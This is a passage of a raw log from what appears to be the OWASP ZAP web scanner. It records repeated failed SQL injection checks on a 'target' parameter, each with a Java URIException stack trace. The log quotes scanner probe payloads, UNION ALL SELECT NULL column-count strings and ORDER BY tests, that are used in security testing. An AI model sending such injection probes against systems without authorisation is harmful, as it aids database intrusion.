parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685563 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685565 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685566 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685568 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685570 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685571 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685572 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP ORDER BY 8906-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685573 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685575 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685576 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685577 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685578 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685580 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685581 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685582 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 